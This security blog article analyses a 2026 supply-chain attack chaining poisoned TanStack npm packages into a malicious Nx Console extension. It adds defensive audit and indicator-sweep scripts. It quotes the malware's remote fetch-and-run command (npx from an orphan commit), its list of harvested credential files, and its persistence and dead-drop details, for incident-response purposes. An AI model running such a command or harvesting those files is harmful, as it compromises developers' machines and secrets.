
From TanStack to Nx Console: Chained Supply-Chain Attack CVE-2026-45321 / CVE-2026-48027

Two CISA KEV-listed npm and VS Code supply-chain breaches in May 2026 turned out to be one connected attack. CVE-2026-45321 hit 84 versions across 42 @tanstack/* packages on May 11; stolen GitHub credentials from that leak then powered CVE-2026-48027, the malicious Nx Console v18.95.0 push on May 18.


Makoto Horikawa

Backend Engineer / AWS / Django

2026.05.28 | 9 min read

Two supply-chain attacks observed in quick succession on May 11 and May 18, 2026 have turned out to be a single chained incident. On May 27, 2026, CISA added both CVEs — CVE-2026-45321 (TanStack) and CVE-2026-48027 (Nx Console) — to the Known Exploited Vulnerabilities (KEV) catalog on the same day.

May 11 was when the npm packages of TanStack, the React routing library family, were poisoned. Forty-two packages including @tanstack/react-router, accounting for 84 versions in total, were shipped from the legitimate npm registry with attacker-injected code. A package that pulls 12.7M weekly downloads went global in a publication window of just six minutes.

Then on May 18, the credentials leaked in that first stage powered the next strike. Version 18.95.0 of Nx Console, the VS Code extension shipped by Nx, was distributed as a malicious build for 11 minutes on the Visual Studio Marketplace and 36 minutes on Open VSX. The package was engineered to siphon a user's GitHub credentials, AWS credentials, SSH private keys, 1Password Vault contents, Kubernetes tokens, and even Claude Code settings stored under ~/.claude/.

Snyk dubbed the campaign "Mini Shai-Hulud," and StepSecurity attributed it to the actor group "TeamPCP." Joint analyses from Socket and StepSecurity, together with the postmortems from both TanStack and Nx, have brought into focus what is shaping up to be one of the largest JavaScript/TypeScript supply-chain attacks of 2026.

What Happened: A Seven-Day Chain From May 11 to May 18

Laid out in chronological order, the attack breaks into two stages. The credentials obtained in stage one (TanStack) were used in stage two (Nx Console) to poison an entirely different target — a deliberately planned multi-stage operation.

| Date/Time (UTC) | Event | Impact |
|---|---|---|
| 5/11 19:20 | TanStack's GitHub Actions pipeline is hijacked by the attacker | Malicious npm publishing with a legitimate OIDC token |
| 5/11 19:26 | 42 packages, 84 versions fully published | router_init.js injected into every package |
| 5/11 ~19:46 | StepSecurity researcher ashishkurmi detects it | Warning raised 20–26 minutes after publication |
| 5/11 same day | An Nx contributor runs pnpm install on an older pnpm 10.14 | A prepare script leaks a GitHub CLI OAuth token |
| 5/11–5/16 | Attacker lurks inside the Nx repository for about 5 days and 4 hours | Creates orphan commit 558b09d7 |
| 5/18 12:30 | Nx Console v18.95.0 published (VS Code Marketplace) | Malicious VSIX becomes downloadable |
| 5/18 12:33 | Published on Open VSX as well | Spreads to VSCodium / Cursor and others |
| 5/18 12:41 | Nx maintainer notices something odd in a notification email, unpublishes | Pulled from VS Code Marketplace 11 minutes after release |
| 5/18 13:09 | Also pulled from Open VSX | Fully removed within 36 minutes of publication |
| 5/27 | CISA KEV adds both entries simultaneously | Remediation countdown begins for U.S. federal agencies |

The exposure windows were as short as six minutes and 11–36 minutes respectively, but the versions downloaded in that interval continue to live on in CI/CD pipelines around the world. Follow-up reporting from Cryptika and Strobes indicates the damage spread further, reaching maintainer accounts at Mistral AI and UiPath as well.
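One way to find lockfile entries that were published inside the May 11 window, as an added example that is not part of the original article. It assumes the caller supplies publish times from each package's registry metadata; the lockfile, version numbers and timestamps are constructed, and the age check mirrors a 7-day (10080-minute) minimum release age.

```javascript
// Added example: find @tanstack/* lockfile entries published inside the
// exposure window, and whether a 7-day release-age gate would have refused them.
const WINDOW_START = Date.parse('2026-05-11T19:20:00Z');
const WINDOW_END = Date.parse('2026-05-11T19:27:00Z'); // exclusive; assumes "19:26" runs through 19:26:59
const MIN_AGE_MINUTES = 10080; // 7 days

// lock: parsed package-lock.json (lockfileVersion 2 or 3, "packages" map).
// times: { name: { version: ISO publish time } }, taken from the "time" field
// of each package's registry metadata and supplied by the caller.
function auditLock(lock, times, installedAtIso) {
  const report = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    const cut = key.lastIndexOf('node_modules/');
    if (cut < 0) continue; // root project or workspace entry
    const name = entry.name || key.slice(cut + 'node_modules/'.length);
    if (!name.startsWith('@tanstack/')) continue;
    const iso = (times[name] || {})[entry.version];
    if (!iso) {
      report.push({ name, version: entry.version, verdict: 'publish-time-unknown' });
      continue;
    }
    const published = Date.parse(iso);
    const ageMinutes = (Date.parse(installedAtIso) - published) / 60000;
    report.push({
      name,
      version: entry.version,
      verdict: published >= WINDOW_START && published < WINDOW_END ? 'published-in-window' : 'outside-window',
      ageGateWouldRefuse: ageMinutes < MIN_AGE_MINUTES,
    });
  }
  return report;
}

// Constructed sample data; the version numbers are placeholders, not real releases.
const LOCK = { lockfileVersion: 3, packages: {
  '': { name: 'demo-app' },
  'node_modules/@tanstack/react-router': { version: '0.0.2-constructed' },
  'node_modules/ui/node_modules/@tanstack/react-query': { version: '0.0.1-constructed' },
  'node_modules/some-lib': { version: '1.0.0' },
} };
const TIMES = {
  '@tanstack/react-router': { '0.0.2-constructed': '2026-05-11T19:23:10Z' },
  '@tanstack/react-query': { '0.0.1-constructed': '2026-04-02T08:00:00Z' },
};
console.log(auditLock(LOCK, TIMES, '2026-05-11T20:05:00Z'));
```

An entry reported as publish-time-unknown means the registry no longer lists that version, which for an unpublished release is itself worth following up.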

What TanStack And Nx Console Are

TanStack is an OSS collective led by U.S.-based developer Tanner Linsley, shipping the React data-fetching library TanStack Query (formerly React Query), the routing library TanStack Router, and the table-rendering library TanStack Table. Because its libraries are framework-agnostic and ship Vue, Solid, and Svelte versions alongside React, virtually every JavaScript-ecosystem web developer uses them, directly or transitively. The 12.7 million weekly downloads of @tanstack/react-router alone speak to that reach.

Nx Console, on the other hand, is the VS Code GUI extension for the Nx monorepo toolchain developed by Nrwl (now Nx). Nx itself helps engineering teams consolidate large JavaScript/TypeScript projects into a single "monorepo" and is embedded inside the in-house developer platforms of major companies including Google, Microsoft, Roche, and Capital One. Nx Console surfaces that tooling inside VS Code and, per StepSecurity's analysis, has reached 2.2 million cumulative installs.

Both projects sit at the core of the JavaScript/TypeScript developer toolchain — from individual web-app developers, to enterprise CI/CD pipelines, to large Nx Cloud customers. That is precisely why this campaign is being described as a "carefully aimed supply-chain attack."

CVE-2026-45321: TanStack npm Poisoning Across 42 Packages

Stage one combined three distinct GitHub Actions misconfigurations into a remarkably polished attack. NVD classifies it as CWE-506 (Embedded Malicious Code) with CVSS 9.6.

| Item | Details |
|---|---|
| CVE ID | CVE-2026-45321 |
| CVSS v3.1 | 9.6 (Critical) |
| Affected packages | 42 @tanstack/* packages, 84 versions in total |
| Technique | pull_request_target Pwn Request + Actions cache poisoning + OIDC token memory extraction |
| Malicious file | router_init.js (~2.3MB, obfuscated) |
| Exposure window | May 11, 2026 19:20–19:26 UTC (6 minutes) |
| Detected by | ashishkurmi (StepSecurity) |
| Attributed actor | TeamPCP (StepSecurity attribution) |
| CISA KEV | Added on May 27, 2026 |

The crux of the attack was a misconfigured GitHub Actions pull_request_target trigger — the classic "Pwn Request" weakness, where a PR coming from a fork is allowed to run CI with the privileges of the upstream repository. The attacker tampered with the build cache via a fork PR, poisoned the cache the moment TanStack's release pipeline kicked in, and then siphoned the legitimate npm OIDC token straight out of the runner's memory, publishing malicious versions under TanStack's own identity.
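A heuristic audit for the workflow pattern described above, as an added example rather than code from TanStack, StepSecurity or the original article. The rule set (PR-head checkout, cache use, write scopes, non-SHA action references) and the sample workflow are assumptions constructed for illustration.

```javascript
// Added example: line-based heuristic audit of one workflow file (no YAML
// parser). Hits are leads for manual review, not proof of exploitability.
const RULES = [
  // Fork-controlled code is checked out into the privileged run.
  ['pr-head-checkout', /ref:.*github\.event\.pull_request\.head\.(sha|ref)|refs\/pull\//],
  // Cache entries written here can be restored by a later release job.
  ['cache-use', /uses:\s*actions\/cache(\/save)?@/],
  ['write-scope', /^\s*(id-token|contents|packages):\s*write\b|permissions:\s*write-all/],
];
const USES = /^\s*-?\s*uses:\s*([^\s#@]+)@([^\s#]+)/;

function auditWorkflow(yamlText) {
  const lines = yamlText.split('\n').map((l) => l.replace(/(^|\s)#.*$/, ''));
  const forkTriggered = lines.some((l) => /\bpull_request_target\b/.test(l));
  const findings = [];
  lines.forEach((text, i) => {
    const m = USES.exec(text);
    // Local ("./") actions have no ref; anything else should be a 40-hex SHA.
    if (m && !m[1].startsWith('.') && !/^[0-9a-f]{40}$/.test(m[2])) {
      findings.push({ rule: 'unpinned-action', line: i + 1, detail: `${m[1]}@${m[2]}` });
    }
    if (!forkTriggered) return;
    for (const [rule, re] of RULES) {
      if (re.test(text)) findings.push({ rule, line: i + 1, detail: text.trim() });
    }
  });
  const has = (rule) => findings.some((f) => f.rule === rule);
  // Pwn Request shape: fork code runs while the job can write caches or holds write scope.
  const pwnRequest = has('pr-head-checkout') && (has('cache-use') || has('write-scope'));
  return { forkTriggered, pwnRequest, findings };
}

// Constructed sample, not TanStack's actual workflow.
const SAMPLE = `
on:
  pull_request_target:
permissions:
  contents: write
jobs:
  bench:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: \${{ github.event.pull_request.head.sha }}
      - uses: actions/cache@0123456789abcdef0123456789abcdef01234567
      - run: pnpm install && pnpm bench
`;
console.log(auditWorkflow(SAMPLE));
```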

What deserves particular attention is that this is the first known case of malicious npm packages being delivered with valid SLSA provenance. SLSA is a mechanism for cryptographically attesting the build origin of a package, and npm has supported it natively since v9. Because the attacker hijacked a legitimate CI environment, the SLSA attestation issued from it was "genuine" — signature verification cannot tell the malicious package apart. The provenance layer, treated by many as "the last line of defense in supply-chain assurance," has been breached.

router_init.js bundled together a "credential-harvesting engine" that pulled secrets from AWS IMDS (instance metadata service), Secrets Manager, SSM Parameter Store, HashiCorp Vault, and Kubernetes service-account tokens, alongside a "worm propagation module" that re-spread itself through downstream victim CI. According to Rescana, the damage spread to dozens of OSS maintainer accounts, including those associated with Mistral AI and UiPath.

CVE-2026-48027: Leaked Credentials Pivot Into Nx Console

Stage two used the "Nx contributor's GitHub CLI OAuth token" leaked in stage one as its starting point. NVD again classifies this as CWE-506, with CVSS 9.3 (v4.0).

| Item | Details |
|---|---|
| CVE ID | CVE-2026-48027 |
| CVSS v4.0 | 9.3 (Critical) |
| Affected version | Nx Console v18.95.0 (single version) |
| Fixed version | v18.100.0 or later |
| Distribution channels | VS Code Marketplace, Open VSX |
| Trigger conditions | v18.95.0 installed AND a workspace opened |
| Estimated impact | ~6,000+ activations; Nx CLI / Nx Cloud are not affected |
| CISA KEV | Added on May 27, 2026 |

There are three technical highlights. First, the attacker created an orphan commit — a commit unreachable from any branch — inside the nrwl/nx repository. The SHA is 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2. A 497KB obfuscated dropper was stashed inside as a hidden cache, invisible from any branch view. It cannot be found by a naive walk of commit history; only those who know the SHA can pull it.

Second, the malicious VSIX itself was a mere 2,777 bytes of added code. Those bytes were injected into main.js and, on startup, executed npx -y github:nrwl/nx#558b09d7 to fetch the contents of the orphan commit above. Keeping the VSIX body lightweight is how the attacker slipped past Microsoft's automated scanning.

Third, the payload included a Sigstore forgery module. Combined with the stolen npm OIDC tokens, the attacker could fetch a legitimate signing certificate from Sigstore and then, from a victim's CI environment, re-distribute further "valid SLSA provenance" malicious npm packages downstream. In other words, the same "provenance forgery" toolkit used in the TanStack attack was being set up for even broader distribution through Nx.

What Gets Stolen: The Full Credential Catalog

Immediately after Nx Console v18.95.0 launches, it begins harvesting every kind of credential it can find on the developer's machine. According to StepSecurity's analysis, the attack is organized into six collection modules.

| Target | Collection method |
|---|---|
| GitHub | ~/.config/gh/hosts.yml, .git-credentials, environment variables + process memory scan |
| npm | OIDC token exchange (for Trusted Publishing) |
| AWS | IMDS / ECS metadata, Secrets Manager / SSM |
| HashiCorp Vault | Via Kubernetes / AWS IAM auth |
| 1Password | If the CLI session is active, full Vault extraction |
| Kubernetes | Service-account tokens |
| SSH / GPG | Private keys under ~/.ssh/ |
| Claude Code | API settings and history under ~/.claude/ |
| Docker / GCP | Configuration files in general |
| Application connections | Various .env / connection strings |

Worth singling out: Claude Code settings (~/.claude/) are explicitly in scope. As AI coding assistants proliferate, developers increasingly accumulate AI-related credentials and conversation history under their home directory, and attackers have already added that to their target list. It is an early sign of how supply-chain attacks are evolving in 2026 and beyond.

The stolen data is exfiltrated over three channels to attacker infrastructure: HTTPS POST (to a hard-coded C2 domain over port 443), commits made through the GitHub API to an attacker-controlled repository, and DNS tunneling as a fallback. The data is wrapped in hybrid AES-256-GCM + RSA-OAEP encryption, so network monitoring cannot inspect the contents in flight.

The persistence mechanism is equally crafted. On macOS, the malware drops a Python backdoor at ~/.local/share/kitty/cat.py and registers a LaunchAgent so it survives reboots. The backdoor then polls the GitHub Search API hourly with api.github.com/search/commits?q=firedalazer, pulling attacker-signed commits as "dead-drop" messages, verifying them against a 4096-bit RSA public key, and only then executing the embedded command. Only the attacker can sign — so third parties cannot inject fake commands into the channel.

What To Do Now

1. If you may have used Nx Console v18.95.0, check for IoCs immediately. If you remember installing or updating to that version between 12:30 and 13:09 UTC on May 18, look for the following files and processes.

  • macOS: ~/.local/share/kitty/cat.py / ~/Library/LaunchAgents/com.user.kitty-monitor.plist
  • Linux/macOS: /var/tmp/.gh_update_state
  • Linux: unexpected passwordless entries in /etc/sudoers
  • Processes carrying the environment variable __DAEMONIZED=1
  • Python processes whose names contain kitty-

2. If anything matches, rotate every credential stored on the machine. "Just delete the files" is not enough. GitHub PATs, SSH keys, AWS access keys, GCP keys, npm tokens, Vault tokens, Kubernetes service-account tokens, 1Password Vault passwords, AI assistant configurations such as Claude Code or Cursor — literally every credential needs to be reissued. For highly sensitive environments, fully re-imaging the machine is the recommended response.

3. Audit CI logs for TanStack-dependent projects all the way back to May 11. If your repositories use @tanstack/*, builds that ran during or after the 19:20–19:26 UTC window on May 11 may have pulled in a poisoned version. Check the resolved versions in package-lock.json, and if any tainted releases were picked up, assume the CI worker's credentials are also compromised and audit accordingly.

4. Upgrade pnpm to 10.16 or later. The proximate trigger of the Nx contributor's compromise was a bug in pnpm 10.14 that silently ignored the minimum-release-age=10080 setting (which is meant to refuse to install packages newer than seven days). The setting works correctly from pnpm 10.16 onward. "Do not adopt brand-new versions instantly" is a powerful way to blunt the immediate blast radius of a supply-chain attack.

5. Audit GitHub Actions pull_request_target triggers across the entire organization. The root cause of the TanStack breach was the classic "Pwn Request" weakness. Any repository that uses pull_request_target on PRs from forks while also holding write-scope permissions (npm publish, tag push, Action cache writes) needs to revisit its configuration immediately. Action dependencies (the uses: org/action@v1 form) should also be switched from floating references to SHA-pinned references.

6. Consider isolating AI assistant configurations. The fact that AI coding assistant settings — Claude Code included — have become attack targets is significant, and they tend to live in highly predictable locations like ~/.claude/. Corporate API keys should not sit in plaintext on individual developer machines; consider provisioning them through an in-house secrets manager or SSO-issued credentials instead.
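The step 1 checks as a script, added here as an example and not taken from Nx's or StepSecurity's tooling. It assumes Node.js is available; the function and parameter names are illustrative, and matching Python processes by command line is an interpretation of the process-name indicator.

```javascript
// Added example: sweep for the host artifacts listed in step 1. `root` and
// `home` are parameters so the same code can inspect a mounted disk image or a
// test tree; the defaults inspect the live system.
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

const read = (p) => { try { return fs.readFileSync(p, 'latin1'); } catch { return ''; } };

function sweep({ root = '/', home = os.homedir() } = {}) {
  const at = (...parts) => path.join(root, ...parts);
  const hits = [];
  for (const f of [
    at(home, '.local/share/kitty/cat.py'),
    at(home, 'Library/LaunchAgents/com.user.kitty-monitor.plist'),
    at('var/tmp/.gh_update_state'),
  ]) {
    if (fs.existsSync(f)) hits.push({ ioc: 'file', where: f });
  }
  // Passwordless sudo rules. Needs read access to sudoers; legitimate
  // NOPASSWD rules exist, so each hit is a line to review.
  read(at('etc/sudoers')).split('\n').forEach((l, i) => {
    if (!l.trim().startsWith('#') && l.includes('NOPASSWD')) {
      hits.push({ ioc: 'sudoers', where: `line ${i + 1}: ${l.trim()}` });
    }
  });
  // Linux only: /proc/<pid>/environ and cmdline are NUL-separated. Other
  // users' processes are readable only as root.
  let pids = [];
  try { pids = fs.readdirSync(at('proc')).filter((d) => /^\d+$/.test(d)); } catch {}
  for (const pid of pids) {
    const env = read(at('proc', pid, 'environ')).split('\0');
    const cmd = read(at('proc', pid, 'cmdline')).split('\0').join(' ').trim();
    if (env.includes('__DAEMONIZED=1')) hits.push({ ioc: 'env', where: `pid ${pid}` });
    if (/python/i.test(cmd) && cmd.includes('kitty-')) {
      hits.push({ ioc: 'process', where: `pid ${pid}: ${cmd}` });
    }
  }
  return hits;
}

console.log(sweep()); // live host; an empty array means none of the listed artifacts were found
```

An empty result only covers the indicators listed above, so it does not replace the credential rotation in step 2 for a machine that ran v18.95.0.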

Why It's Called "Mini Shai-Hulud": Connection to the 2025 Worm

Snyk named this campaign "Mini Shai-Hulud." "Shai-Hulud" was the codename of the large-scale worming supply-chain attack that hit the npm ecosystem in September 2025, during which hundreds of npm packages were chain-infected. This campaign is positioned as a "smaller" but "more sophisticated" successor.

The difference from the 2025 version is that TeamPCP has evolved the playbook into a "provenance-backed" attack carried out through a legitimate CI environment. Where the 2025 version was "hijack a maintainer account and publish," the 2026 version is "hijack a legitimate pipeline and publish with signatures and provenance attached." Even as the industry baseline for supply-chain assurance rises, attacks that ride one step above that baseline keep maturing in parallel.

For continuous observation of chained supply-chain attacks like this one, this site operates an OSS Supply-Chain Scanner. It lets you check the current poisoning status of any @tanstack/* packages you use, along with related dependencies (packages contaminated via the Mistral AI / UiPath paths). A list of CVEs currently under active exploitation, including their CISA KEV listing history, can be tracked from the CISA KEV Dashboard (Japanese edition).

Nx's postmortem lists four follow-up measures: requiring publication approvals via GitHub Actions environments, monitoring GitHub audit logs, enforcing SHA-pinned GitHub Actions org-wide, and requiring two-person approval on the publisher side. Unless OSS maintainers across the ecosystem adopt equivalent controls, the structural fragility that allowed a TanStack → Nx chain leaves the door open for a third or fourth hop at any time.
